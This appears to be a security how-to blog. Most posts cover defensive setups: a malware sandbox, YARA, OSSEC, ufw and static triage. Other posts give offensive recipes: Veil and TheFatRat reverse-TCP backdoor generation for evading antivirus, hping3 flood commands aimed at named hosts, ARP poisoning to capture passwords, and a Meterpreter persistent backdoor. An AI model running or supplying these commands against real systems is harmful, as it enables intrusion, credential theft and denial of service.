Install Qemu and KVM:
#cd ~
#apt-get update
#apt-get install qemu-kvm qemu
#ln -s /usr/bin/qemu-system-x86_64 /bin/qemu
Install P7zip-full
#apt-get install p7zip-full
Install ZeroWine-Tryouts:
#cd /usr/local/sbin
#wget https://master.dl.sourceforge.net/project/zerowine-tryout/zerowine-tryout/0.0.2.x/Prebuilt%20QEMU%20Image/zerowine-tryout-alpha4.1-image.7z
#7za x ./zerowine-tryout-alpha4.1-image.7z
#cd zerowine_vm/
#chmod +x ./start_img.sh
Back up the default IMG file before using ZeroWine-Tryouts:
#cp ./zerowine.img ./zerowine.img.bak
Running ZeroWine-Tryouts:
#./start_img.sh
More Information:
The default username and password of ZeroWine-Tryouts are:
root:zerowine1
malware:malware1
Saturday, December 15, 2018
Friday, December 14, 2018
Basic Malware Checking - PART II - Using IDA Pro
IDA Pro version: 7.0
1) Go to "Options"->"General...", and check the options below:
Comments
Repeatable comments
Auto comments
2) Go to "View"->"Open subviews"->"Segments", and see if the application is packed.
3) Go to "View"->"Open subviews"->"Imports", and see if there is any risky API being used.
4) Go to "View"->"Open subviews"->"Strings", and see if there are any suspicious keywords.
Tuesday, December 4, 2018
Install and run WINE
Install Wine:
#dpkg --add-architecture i386
#apt-get update
#apt-get install wine
#apt-get install winetricks
#apt-get install wine32
Configure Wine:
#winecfg
Execute applications through Wine:
#wine test.exe
Monday, December 3, 2018
Basic Malware Checking - PART I
1) Rename the sample to an extension that the OS will not execute. For example:
#mv ./test.exe ./test.ex_
2) Use ClamAV and YARA to scan the test.ex_ file.
3) Check the hash of the test.ex_ file by using the command below:
#whois -h hash.cymru.com `md5sum ./test.ex_`
4) Use the strings command to see whether any suspicious string sits in the test.ex_ file, as shown below:
#strings ./test.ex_
5) Use the peid application to check whether the test.ex_ file is packed.
6) Check the APIs imported by the test.ex_ file using Dependency Walker (http://www.dependencywalker.com/).
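A static first pass that automates steps 3 to 6 above, and the Imports/Strings/Segments checks of Part II, as an added example that is not part of the original posts: it hashes the sample, extracts printable strings the way strings(1) does, flags well-known risky API names and suspicious keywords, and uses whole-file entropy as a packer heuristic. The RISKY_APIS list, the SUSPICIOUS_PATTERNS table and the SAMPLE bytes are assumptions constructed for the demonstration.

```python
import hashlib
import math
import re
import sys

# Imported API names that warrant a closer look during import review
# (process injection, download-and-execute, persistence, anti-debugging).
# Assumed starter list; extend it for your own triage.
RISKY_APIS = {
    "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
    "URLDownloadToFileA", "URLDownloadToFileW", "WinExec", "ShellExecuteA",
    "IsDebuggerPresent", "SetWindowsHookExA", "RegSetValueExA", "CryptEncrypt",
}

# Keyword classes worth flagging in the strings listing (assumed set).
SUSPICIOUS_PATTERNS = {
    "url": re.compile(r"https?://[^\s\"']+"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "run_key": re.compile(r"CurrentVersion\\Run", re.IGNORECASE),
}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 8.0 being maximal; packed or encrypted payloads sit near the top."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)

def extract_strings(data: bytes, min_len: int = 4):
    """Printable-ASCII runs of at least min_len bytes, like the strings(1) default."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def triage(data: bytes) -> dict:
    """Static first-pass report: hashes, packing heuristic, risky imports, keywords."""
    strs = extract_strings(data)
    entropy = shannon_entropy(data)
    keywords = {}
    for name, pat in SUSPICIOUS_PATTERNS.items():
        hits = sorted({m.group() for s in strs for m in pat.finditer(s)})
        if hits:
            keywords[name] = hits
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "entropy": round(entropy, 2),
        # Whole-file entropy above ~7 bits/byte is a common packer hint; confirm it
        # in the Segments view (few sections, tiny code section, large opaque data).
        "likely_packed": entropy > 7.0,
        # Import-table names are NUL-terminated, so they surface as exact runs.
        "risky_apis": sorted(s for s in strs if s in RISKY_APIS),
        "suspicious_strings": keywords,
    }

# Constructed stand-in for test.ex_: not a real PE, just the kinds of artefacts
# that the Imports and Strings views would surface.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + b"kernel32.dll\x00VirtualAllocEx\x00WriteProcessMemory\x00CreateRemoteThread\x00"
    + b"http://example.invalid/update.bin\x00"
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    + b"\x00" * 64
)

if __name__ == "__main__":
    # Pass a file path to triage a real sample; otherwise the constructed blob is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for key, value in triage(blob).items():
        print(f"{key}: {value}")
```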
Saturday, December 1, 2018
How to Prevent DDoS Attacks on a Cloud Server Using Open Source Software
How to Prevent DDoS Attacks on a Cloud Server Using Open Source Software: Author and Co-Founder of Pickaweb, Tony Messer is back to tell you how to Prevent DDoS Attacks on a Cloud Server Using Open Source Software.
Saturday, November 24, 2018
Compiling Python files
Compiling PY to EXE:
1) Utilize PIP to install PYINSTALLER:
>pip install pyinstaller
2) After the installation above is done, leverage PYINSTALLER command to compile PY files into a single EXE file as shown below:
>pyinstaller -F test.py
3) The final EXE file should be under the %pythonPath%\dist folder.
Compiling PY to Byte Code (i.e. pyc):
1) Place all the PY files to be compiled into a folder.
2) Utilize CMD to enter the folder and execute the command below:
>python -m compileall
Monday, November 19, 2018
Install and run Phantom-Evasion
Phantom-Evasion is a backdoor obfuscator.
1) Use Veil to generate a shellcode:
#veil
veil>:use 2
veil>:list payloads
veil>:use rev_tcp
veil>:set BadChars \x00\x0a
veil>:set Encoder xor
veil>:set LHOST 192.168.0.15
veil>:set LPORT 4444
veil>:generate
Copy the shellcode just generated.
2) Install and run Phantom-Evasion:
#cd ~
#mkdir ./phantom-evasion
#cd phantom-evasion/
#git clone https://github.com/oddcod3/Phantom-Evasion.git
#cd Phantom-Evasion
#chmod a+x ./phantom-evasion.py
#./phantom-evasion.py
Setting up and executing Veil-Evasion
Veil-Evasion is also a backdoor generator that helps produce undetectable backdoors.
Installation:
#apt-get update
#apt-get install veil-evasion
#veil
Execution:
#veil
Utilization:
Veil>: use 1
Veil/Evasion>: list
Veil/Evasion>: use 28
[python/meterpreter/rev_tcp>>]: set LHOST 192.168.0.150
[python/meterpreter/rev_tcp>>]: generate
[>] Please enter the base name for output files (default is payload): python_setupx86
[>] Please enter the number of your choice: 1
Setting up and executing TheFatRat
TheFatRat is a backdoor generator that helps produce undetectable backdoors.
Installation:
#cd ~
#mkdir ./fatrat
#cd fatrat
#git clone https://github.com/Screetsec/TheFatRat.git
#cd TheFatRat
#chmod +x setup.sh && ./setup.sh
#chmod a+x ./fatrat
#chmod a+x ./powerfull.sh
Execution:
#./fatrat
Sunday, November 11, 2018
Configure ufw
/* Installation: */
# apt-get update
# apt-get install ufw gufw
/* Enable ufw */
# ufw enable
/* Disable ufw */
# ufw disable
/* Add rules */
# ufw allow from 192.168.0.251
# ufw deny 80/tcp
/* Delete rules */
# ufw delete allow from 192.168.0.251
/* Reload ufw */
# ufw reload
/* Delete rules and disable ufw */
# ufw reset
/* Check current status */
# ufw status verbose
/* Check ufw logs */
# tail -n 30 -f /var/log/messages
/* Start on boot */
# vi /etc/rc.local
/usr/sbin/ufw enable
/usr/sbin/ufw allow from 192.168.0.251
/usr/sbin/ufw deny 80/tcp
/usr/sbin/ufw allow 79:81/tcp
/usr/sbin/ufw deny in on eth0
/usr/sbin/ufw allow out on eth0
[ESC]:ZZ
Friday, October 26, 2018
Install and use YARA at Linux
/*Install Yara*/
#apt-get update
#apt-get install yara
#which yara
/usr/bin/yara
/*Download Yara Rules*/
#cd /usr/local/sbin
#mkdir ./yararules
#cd yararules
#git clone https://github.com/Yara-Rules/rules.git
#ll /usr/local/sbin/yararules/rules
/*Execute Yara*/
#yara --help
YARA 3.8.1, the pattern matching swiss army knife.
Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID
Mandatory arguments to long options are mandatory for short options too.
      --atom-quality-table=FILE        path to a file with the atom quality table
  -c, --count                          print only number of matches
  -d, --define=VAR=VALUE               define external variable
      --fail-on-warnings               fail on warnings
  -f, --fast-scan                      fast matching mode
  -h, --help                           show this help and exit
  -i, --identifier=IDENTIFIER          print only rules named IDENTIFIER
  -l, --max-rules=NUMBER               abort scanning after matching a NUMBER of rules
      --max-strings-per-rule=NUMBER    set maximum number of strings per rule (default=10000)
  -x, --module-data=MODULE=FILE        pass FILE's content as extra data to MODULE
  -n, --negate                         print only not satisfied rules (negate)
  -w, --no-warnings                    disable warnings
  -m, --print-meta                     print metadata
  -D, --print-module-data              print module data
  -e, --print-namespace                print rules' namespace
  -S, --print-stats                    print rules' statistics
  -s, --print-strings                  print matching strings
  -L, --print-string-length            print length of matched strings
  -g, --print-tags                     print tags
  -r, --recursive                      recursively search directories
  -k, --stack-size=SLOTS               set maximum stack size (default=16384)
  -t, --tag=TAG                        print only rules tagged as TAG
  -p, --threads=NUMBER                 use the specified NUMBER of threads to scan a directory
  -a, --timeout=SECONDS                abort scanning after the given number of SECONDS
  -v, --version                        show version information
Send bug reports and suggestions to: vmalvarez@virustotal.com.
#yara -r -w -f -p 10 /usr/local/sbin/yararules/rules/index.yar /root 2>/dev/null
network_smtp_raw /root/test.pcap
Big_Numbers1 /root/test.pcap
sniff_lan /root/.config/wireshark/recent_common
with_sqlite /root/.local/share/evolution/addressbook/system/contacts.db
with_sqlite /root/.config/honeyd/names
Big_Numbers1 /root/md5_arpd.txt
vmdetect /root/.cache/gstreamer-1.0/registry.x86_64.bin
SurtrStrings /root/.cache/gstreamer-1.0/registry.x86_64.bin
Surtr /root/.cache/gstreamer-1.0/registry.x86_64.bin
with_sqlite /root/.cache/tracker/meta.db-wal
Friday, October 12, 2018
Using tcpkill to send RSTs to cut off TCP connections
In Kali Linux, the tcpkill application is located at /usr/sbin/tcpkill.
Usage:
/usr/sbin/tcpkill -i NETWORK_INTERFACE -DEGREE TCPDUMP_FILTER_EXPRESSION
Example:
/usr/sbin/tcpkill -i eth0 -9 host 192.168.0.2 and host 192.168.3.10
NETWORK_INTERFACE is the network interface that will send out the RST segments.
DEGREE is a number from 1 to 9 representing the rate at which RST segments are sent; the higher the number, the faster the rate. For the filter expression, refer to the tcpdump manual.
Sunday, September 30, 2018
Let the syscheck function of OSSEC check files' integrity repeatedly
1)#vi /var/ossec/etc/ossec.conf
2) Add the following line between the <syscheck> and </syscheck> tags:
<auto_ignore>no</auto_ignore>
3)Restart OSSEC
Tuesday, September 18, 2018
Install and configure OSSEC with Agentless mode
Author: demonalex (chaoyi.huang@connect.polyu.hk)
[Installing OSSEC]
#cd /usr/local/sbin
#wget https://github.com/ossec/ossec-hids/archive/2.9.3.tar.gz
#tar -zxvf ./2.9.3.tar.gz
#cd ossec-hids-2.9.3/
#./install.sh
[Initialize OSSEC's setting]
For English type : en
What kind of installation do you want (server,agent,local.hybrid): server
Choose where to install the OSSEC-HIDS [/var/ossec]: /var/ossec
Do you want email notification: n
Do you want to run the integrity check daemon: y
Do you want to run the rootkit detection engine: y
Do you want to enable active response: n
Do you want to enable remote syslog (port 514 udp): y
[Primary files]
/var/ossec/bin/ossec-control #Main Application
/var/ossec/etc/ossec.conf #Main Configuration File
/var/ossec/bin/manage_agents #Agent Management Program
/var/ossec/agentless/register_host.sh #Agentless Host Registration Program
/var/ossec/logs/ossec.log #Main Log File
/var/ossec/logs/alerts/alerts.log #Alert Log File
[Executing OSSEC]
#/var/ossec/bin/ossec-control start
#ps -aef|grep ossec
ossec 747 1 0 May11 ? 00:01:03 /var/ossec/bin/ossec-analysisd
root 753 1 0 May11 ? 00:04:50 /var/ossec/bin/ossec-logcollector
root 765 1 0 May11 ? 01:18:33 /var/ossec/bin/ossec-syscheckd
ossec 789 1 0 May11 ? 00:00:08 /var/ossec/bin/ossec-monitord
[Adding more agents]
#/var/ossec/agentless/register_host.sh add root@192.168.1.189
After entering the password for the agent, use the following command to list the agent just added to the system.
#/var/ossec/agentless/register_host.sh list
*Available hosts:
root@192.168.1.189
[Configuring the Agentless mode]
#vi /var/ossec/etc/ossec.conf
Add the following content between <ossec_config> and </ossec_config> before saving and exiting VI:
<agentless>
<type>ssh_integrity_check_linux</type>
<frequency>3600</frequency>
<host>root@192.168.1.189</host>
<state>periodic</state>
<arguments>/bin /etc/ /sbin</arguments>
</agentless>
<agentless>
<type>ssh_generic_diff</type>
<frequency>3600</frequency>
<host>root@192.168.1.189</host>
<state>periodic_diff</state>
<arguments>ls -la /etc; cat /etc/passwd</arguments>
</agentless>
[Restarting OSSEC with Agentless mode]
#/var/ossec/bin/ossec-control enable agentless
#/var/ossec/bin/ossec-control restart
#ps -aef|grep -i ossec
ossec 21845 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-agentlessd
ossec 21855 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-analysisd
root 21859 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-logcollector
ossecr 21866 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-remoted
root 21871 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-syscheckd
ossec 21875 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-monitord
[Configuring Remote Syslog Pushing]
#vi /var/ossec/etc/ossec.conf
Add the following content between <ossec_config> and </ossec_config> before saving and exiting VI:
<syslog_output>
<server>192.168.1.35</server>
<port>115</port>
</syslog_output>
[Restarting OSSEC with Syslog Pushing]
#/var/ossec/bin/ossec-control enable client-syslog
#/var/ossec/bin/ossec-control restart
[Checking if there is any issue]
#tail -n 10 -f /var/ossec/logs/ossec.log
[Checking the detail of any alert]
#tail -n 30 -f /var/ossec/logs/alerts/alerts.log
[Setting up update-rc.d]
#update-rc.d ossec enable 3 5
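A helper for the agentless configuration step above, as an added example rather than OSSEC's own tooling: it renders the two <agentless> entries for a host, inserts them before the last </ossec_config>, and parses the result to confirm the file is still well-formed. Because ossec.conf may contain several top-level <ossec_config> blocks, the text is wrapped in a dummy root before parsing; SAMPLE_CONF and the function names are assumptions constructed for the demonstration.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

def agentless_block(host, check_type, state, arguments, frequency=3600):
    """Render one <agentless> entry in the shape used in the post above.
    `host` and `arguments` are XML-escaped so a command containing '&' or '<'
    cannot break the configuration file."""
    return (
        "<agentless>\n"
        f"  <type>{check_type}</type>\n"
        f"  <frequency>{int(frequency)}</frequency>\n"
        f"  <host>{escape(host)}</host>\n"
        f"  <state>{state}</state>\n"
        f"  <arguments>{escape(arguments)}</arguments>\n"
        "</agentless>\n"
    )

def add_agentless_entries(conf_text, entries):
    """Insert rendered entries just before the last </ossec_config>; OSSEC merges
    all <ossec_config> blocks, so the last block is as good as the first."""
    marker = "</ossec_config>"
    idx = conf_text.rfind(marker)
    if idx < 0:
        raise ValueError("no </ossec_config> found in ossec.conf")
    return conf_text[:idx] + "".join(entries) + conf_text[idx:]

def list_agentless_entries(conf_text):
    """Return (type, host, state) for every <agentless> entry. ossec.conf may hold
    several top-level <ossec_config> blocks, which is not well-formed XML on its
    own, so the text is wrapped in a dummy root before parsing."""
    root = ET.fromstring("<root>" + conf_text + "</root>")
    return [
        (e.findtext("type"), e.findtext("host"), e.findtext("state"))
        for e in root.iter("agentless")
    ]

# Constructed minimal ossec.conf with two <ossec_config> blocks.
SAMPLE_CONF = """<ossec_config>
  <global>
    <email_notification>no</email_notification>
  </global>
  <syscheck>
    <frequency>79200</frequency>
  </syscheck>
</ossec_config>
<ossec_config>
  <rules>
    <include>local_rules.xml</include>
  </rules>
</ossec_config>
"""

def configure_host(conf_text, host):
    """Add the integrity-check and generic-diff entries from the post for one host
    and fail loudly if the resulting file no longer parses."""
    entries = [
        agentless_block(host, "ssh_integrity_check_linux", "periodic", "/bin /etc/ /sbin"),
        agentless_block(host, "ssh_generic_diff", "periodic_diff", "ls -la /etc; cat /etc/passwd"),
    ]
    new_conf = add_agentless_entries(conf_text, entries)
    list_agentless_entries(new_conf)  # raises ET.ParseError on malformed output
    return new_conf

if __name__ == "__main__":
    print(configure_host(SAMPLE_CONF, "root@192.168.1.189"))
```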
Friday, September 14, 2018
Log in to an SSH server in passwordless mode.
[On the client side:]
1)
#ssh-keygen -t rsa
Keep pressing [ENTER] until the end.
2)
#ssh-copy-id -i $HOME/.ssh/id_rsa.pub root@192.168.0.3
The IP address shown above, namely 192.168.0.3, refers to the server's IP address.
3)
Done!
Friday, August 10, 2018
Utilizing WMI to execute Windows commands remotely at Kali Linux
Usage:
/usr/share/doc/python-impacket/examples/wmiexec.py "USERNAME":"PASSWORD"@IPADDRESS "COMMAND"
Example:
/usr/share/doc/python-impacket/examples/wmiexec.py "administrator":"test123"@192.168.0.68 "netstat -anb"
Friday, July 6, 2018
Detect whether a sniffer exists in your network.
Nmap can be used to verify whether any sniffer is running in your network.
Here is an example of using Nmap to locate the sniffer; 192.168.30.29 is the PC hosting a sniffer.
root@is:~# nmap -sn --script=sniffer-detect 192.168.30.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2018-07-06 11:27 EDT
Nmap scan report for 192.168.30.1
Host is up (0.025s latency).
MAC Address: 00:24:C4:92:C3:21 (Cisco Systems)
Host script results:
|_sniffer-detect: Unknown (tests: "________")
Nmap scan report for 192.168.30.29
Host is up (0.069s latency).
MAC Address: 9C:4E:36:9E:36:2C (Intel Corporate)
Nmap scan report for 192.168.30.128
Host is up (0.024s latency).
MAC Address: EC:88:92:72:20:8C (Motorola Mobility, a Lenovo Company)
Host script results:
|_sniffer-detect: Unknown (tests: "_______1")
Nmap done: 256 IP addresses (3 hosts up) scanned in 12.06 seconds
Thursday, July 5, 2018
Performing ARP SPOOFING/POISONING on Kali Linux #2
1) Enable "net.ipv4.conf.all.forwarding" by executing the command below.
#sysctl net.ipv4.conf.all.forwarding=1
2) Run the "ettercap-graphical".
3) Click "Sniff"->"Unified sniffing...". When a small window pops up, choose the appropriate network adapter as the "Network interface" before tapping the "OK" button.
4) Click "Hosts"->"Scan for hosts".
5) Click "Mitm"->"ARP poisoning...". When a small window shows up, check "Sniff remote connections." before clicking the "OK" button.
6) Finally, tap "Start"->"Start sniffing".
7) Any captured usernames and passwords show up at the bottom of the ettercap window.
Performing ARP SPOOFING/POISONING on Kali Linux #1
1) Utilize the "netdiscover" command to address those nodes located in the same subnet. An example:
#netdiscover -i wlan0 -r 192.168.0.0/24
P.S.: The "wlan0" is the corresponding network adapter, and "192.168.0.0/24" is the corresponding subnet.
2) Enable "net.ipv4.conf.all.forwarding" by executing the command below.
#sysctl net.ipv4.conf.all.forwarding=1
3) Leverage the "arpspoof" command to perform ARP SPOOFING. An example is shown below.
#arpspoof -i wlan0 -t 192.168.0.7 -r 192.168.0.1
P.S.: The "wlan0" is the corresponding network adapter, and "192.168.0.7" is the target IP address. Furthermore, "192.168.0.1" is the gateway.
4) After the commands above are executed, run Wireshark so that confidential information such as passwords can be captured.
Wednesday, July 4, 2018
WIFI Security Inspection Checklist
1) The security of Access Points and Access Controllers
Connect to the corresponding WLAN, then use either Nessus or OpenVAS to fully scan the Access Points and Access Controllers.
2) The robustness of Wireless protocols
Run Kismet by executing the command, kismet, in a shell.
Manually check the encryption algorithm of each WIFI signal.
Bear in mind the following ranking of the WIFI protocols by security robustness:
WPA2 Enterprise > WPA Enterprise > WPA2 PSK > WPA PSK > WEP > No Encryption
3) Wi-Fi Protected Setup (WPS) function
Run Fern WIFI Cracker and select the appropriate wlan0 interface before clicking the "Scan for Access points" button.
Check each access point and see if each of them enables the WPS function.
4) Rogue AP
Run Kismet by executing the command, kismet, in a shell.
Check all signals stronger than -40dBm while walking around.
5) Evil Twins
Run the command, iwlist wlan0 scanning|grep -i 'address:\|essid:'.
There is an example as shown below.
root@alex-kali:~# iwlist wlan0 scanning|grep -i 'address:\|essid:'
Cell 01 - Address: 90:2B:CF:DC:09:15
ESSID:"alex11"
Cell 02 - Address: 80:29:94:D2:2A:1C
ESSID:"Highbridge26"
Cell 03 - Address: 00:26:62:9B:47:87
ESSID:"E5426"
Cell 04 - Address: B0:C2:87:B5:2B:79
ESSID:"TC8717T73"
Cell 05 - Address: 90:1A:CA:DC:12:10
ESSID:"alex6"
Cell 06 - Address: 00:14:D1:D4:64:02
ESSID:"ling23828"
Cell 07 - Address: 58:EF:68:60:C9:87
ESSID:"Linksys15"
Cell 08 - Address: 48:5D:36:56:44:0E
ESSID:"FiOS-TQ4TB"
Cell 09 - Address: 48:5D:36:21:6D:BA
ESSID:"FiOS-Q9BY2"
Cell 10 - Address: D8:D7:75:A8:59:5E
ESSID:"MySpectrumWiFi58-2G"
Cell 11 - Address: 80:29:94:D2:2A:1D
ESSID:"Highbridge23"
Cell 12 - Address: 58:EF:68:60:C9:88
ESSID:"Linksys15"
Cell 13 - Address: 58:EF:68:60:C9:89
ESSID:"Linksys15"
Cell 14 - Address: 20:C0:47:D3:4D:CA
ESSID:"Fios-DRARW-5G"
Cell 15 - Address: 22:C0:47:D3:4D:CB
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 16 - Address: 48:5D:36:56:44:0C
ESSID:"FiOS-TQ4TB-5G"
Cell 17 - Address: 4A:5D:36:56:44:0D
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 18 - Address: B8:D9:4D:4B:AA:0F
ESSID:"MySpectrumWiFi08-5G"
Check the output in order to filter out Evil Twins.
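To make the last step of the checklist less manual, here is an added example (not part of the original checklist) that parses the iwlist output above, reports hidden networks, and flags an ESSID as an evil-twin candidate when it is advertised by BSSIDs from more than one vendor OUI. A nineteenth cell, 02:11:22:33:44:55, is constructed and appended to the page's scan so the check has something to flag.

```python
import re
from collections import defaultdict

# Scan output copied from the iwlist listing in the checklist above, plus one
# constructed cell (02:11:22:33:44:55) to exercise the evil-twin check. In practice
# feed in the live output of: iwlist wlan0 scanning|grep -i 'address:\|essid:'
SCAN_OUTPUT = r"""
Cell 01 - Address: 90:2B:CF:DC:09:15
ESSID:"alex11"
Cell 02 - Address: 80:29:94:D2:2A:1C
ESSID:"Highbridge26"
Cell 03 - Address: 00:26:62:9B:47:87
ESSID:"E5426"
Cell 04 - Address: B0:C2:87:B5:2B:79
ESSID:"TC8717T73"
Cell 05 - Address: 90:1A:CA:DC:12:10
ESSID:"alex6"
Cell 06 - Address: 00:14:D1:D4:64:02
ESSID:"ling23828"
Cell 07 - Address: 58:EF:68:60:C9:87
ESSID:"Linksys15"
Cell 08 - Address: 48:5D:36:56:44:0E
ESSID:"FiOS-TQ4TB"
Cell 09 - Address: 48:5D:36:21:6D:BA
ESSID:"FiOS-Q9BY2"
Cell 10 - Address: D8:D7:75:A8:59:5E
ESSID:"MySpectrumWiFi58-2G"
Cell 11 - Address: 80:29:94:D2:2A:1D
ESSID:"Highbridge23"
Cell 12 - Address: 58:EF:68:60:C9:88
ESSID:"Linksys15"
Cell 13 - Address: 58:EF:68:60:C9:89
ESSID:"Linksys15"
Cell 14 - Address: 20:C0:47:D3:4D:CA
ESSID:"Fios-DRARW-5G"
Cell 15 - Address: 22:C0:47:D3:4D:CB
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 16 - Address: 48:5D:36:56:44:0C
ESSID:"FiOS-TQ4TB-5G"
Cell 17 - Address: 4A:5D:36:56:44:0D
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 18 - Address: B8:D9:4D:4B:AA:0F
ESSID:"MySpectrumWiFi08-5G"
Cell 19 - Address: 02:11:22:33:44:55
ESSID:"Linksys15"
"""

ADDR_RE = re.compile(r"Address:\s*([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})")
ESSID_RE = re.compile(r'ESSID:"(.*)"')
HIDDEN_RE = re.compile(r"^(\\x00)*$")  # empty or all-NUL ESSID = hidden network

def parse_scan(text):
    """Return (bssid, essid) pairs: an Address line opens a cell, the next ESSID line closes it."""
    cells, bssid = [], None
    for line in text.splitlines():
        m = ADDR_RE.search(line)
        if m:
            bssid = m.group(1).upper()
            continue
        m = ESSID_RE.search(line)
        if m and bssid:
            cells.append((bssid, m.group(1)))
            bssid = None
    return cells

def oui(bssid):
    """Vendor prefix: the first three octets of the BSSID."""
    return bssid[:8]

def is_locally_administered(bssid):
    """Bit 1 of the first octet set means a software-assigned MAC, typical of
    virtual BSSIDs and of hostapd-style access points rather than factory radios."""
    return bool(int(bssid[:2], 16) & 0x02)

def evil_twin_candidates(cells):
    """ESSIDs advertised by BSSIDs from more than one vendor OUI. Several BSSIDs
    sharing one OUI (Linksys15 above) are usually one AP with multiple radios."""
    by_essid = defaultdict(list)
    for bssid, essid in cells:
        if not HIDDEN_RE.match(essid):
            by_essid[essid].append(bssid)
    return {e: sorted(b) for e, b in by_essid.items()
            if len(b) > 1 and len({oui(x) for x in b}) > 1}

def hidden_networks(cells):
    return sorted(b for b, e in cells if HIDDEN_RE.match(e))

if __name__ == "__main__":
    scan = parse_scan(SCAN_OUTPUT)
    print("evil-twin candidates:", evil_twin_candidates(scan))
    print("hidden BSSIDs:", [(b, is_locally_administered(b)) for b in hidden_networks(scan)])
```

An ESSID served by a single vendor OUI is not flagged, so a stronger-than-expected signal or an unfamiliar vendor on a known ESSID still deserves a manual look.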
Tuesday, May 29, 2018
Some basic commands for Metasploit Msfconsole
Search for module:
msf > search [regex]
Show all Exploits:
msf > show exploits
Specify an exploit to use:
msf > use [ExploitPath]
Show all Payloads:
msf > show payloads
Specify a Payload to use:
msf > set payload [PayloadPath]
Show all Targets:
msf > show targets
Specify a Target to use:
msf > set target [TargetNumber]
Show all Encoders:
msf > show encoders
Specify an Encoder to use:
msf > set encoder [EncoderPath]
Show options for the current module:
msf > show options
Set options:
msf > set [Option] [Value]
Start exploit:
msf > exploit
msf > run
Saturday, May 26, 2018
Utilizing Hping3 to launch Denial of Service (DoS) attacks
This post is documented for convenience. It does not cover some typical Denial of Service (DoS) attacks such as Ping of Death and Teardrop.
SYN Flood:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Source Port) --flood --rand-source (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 1025 --flood --rand-source test.freeddns.org
Explanation:
-V:Verbose Mode
-c:Packet Count
-d:Data Size
-S:Syn
-w:Window Size
-p:Destination Port
-s:Source Base Port
--flood:Flood Mode
--rand-source:IP Spoofing
UDP Flood:
hping3 --flood --rand-source --udp -p (Victim Port) (Victim IP)
Example:
hping3 --flood --rand-source --udp -p 53 8.8.4.4
Explanation:
--flood:Flood Mode
--rand-source:IP Spoofing
--udp:UDP Mode
-p:Destination Port
ICMP Flood:
hping3 -1 --flood --rand-source (Victim IP)
Example:
hping3 -1 --flood --rand-source 192.168.0.88
Explanation:
-1:ICMP
--flood:Flood Mode
--rand-source:IP Spoofing
Smurf:
hping3 -1 --flood -a (Victim IP) (Broadcast IP)
Example:
hping3 -1 --flood -a 192.168.0.3 192.168.0.255
Explanation:
-1:ICMP
--flood:Flood Mode
-a:The Source IP or Host
Fraggle:
hping3 --udp --flood -p 7 -s 7 -k -a (Victim IP) (Broadcast IP)
Example:
hping3 --udp --flood -p 7 -s 7 -k -a 192.168.0.3 192.168.0.255
Explanation:
--udp:UDP
--flood:Flood Mode
-p:Destination Port
-s:Source Base Port
-k:Keep the source port the same
-a:The Source IP or Host
Land:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Victim Port) -k -a (Victim IP) --flood (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 80 -k -a demonalex.freeddns.org --flood demonalex.freeddns.org
Explanation:
-V:Verbose Mode
-c:Packet Count
-d:Data Size
-S:Syn
-w:Window Size
-p:Destination Port
-s:Source Base Port
-k:Keep the source port the same
-a:The Source IP or Host
--flood:Flood Mode
Tuesday, May 22, 2018
Apply SOCKS Proxy (e.g. Tor) to Linux Shell terminal by using Proxychains
1) Start a SOCKS proxy, such as the Tor service
2) vi /etc/proxychains.conf
3) Add the following line to the end of proxychains.conf
socks5 127.0.0.1 9150
4) Execute the command below to verify that the public IP address has changed
proxychains wget -qO- v4.ifconfig.co
Leverage Tor as a SOCKS proxy
After the Tor Browser has started, point the operating system's SOCKS proxy setting to "127.0.0.1:9150".
P.S.: When the Tor Browser is closed, its SOCKS proxy service shuts down at the same time.
Install and configure Tor
1) Download Tor Browser from https://www.torproject.org/download/download-easy.html.en
2) Move the *.tar.xz file to /usr/local/sbin
3) Execute the commands below
#cd /usr/local/sbin
#tar -xvf ./tor-browser-linux32-7.5.4_en-US.tar.xz
#cd tor-browser_en-US/Browser
#vi ./start-tor-browser
4) Comment out the lines below, then save and exit vi
    if [ "`id -u`" -eq 0 ]; then
        complain "The Tor Browser Bundle should not be run as root. Exiting."
        exit 1
    fi
5) Run the command below
#/usr/local/sbin/tor-browser_en-US/Browser/start-tor-browser
Monday, May 21, 2018
Some examples regarding Shodan's keywords
[Geography]
country:US
city:Guangzhou
geo:33.5,36.3
[Time]
before:01/01/2014
after:01/01/2014
[Network and System Scan]
net:216.0.0.0/16
port:443
os:"windows 2003"
[Site and Page Scan]
hostname:google.com
title:"Server Room"
[Exclusion]
-port:80
Some common use cases of Meterpreter
Install a persistent backdoor:
meterpreter>ps
Locate explorer.exe in the list (suppose its process ID is 623) and execute the commands below:
meterpreter>migrate 623
meterpreter>run metsvc
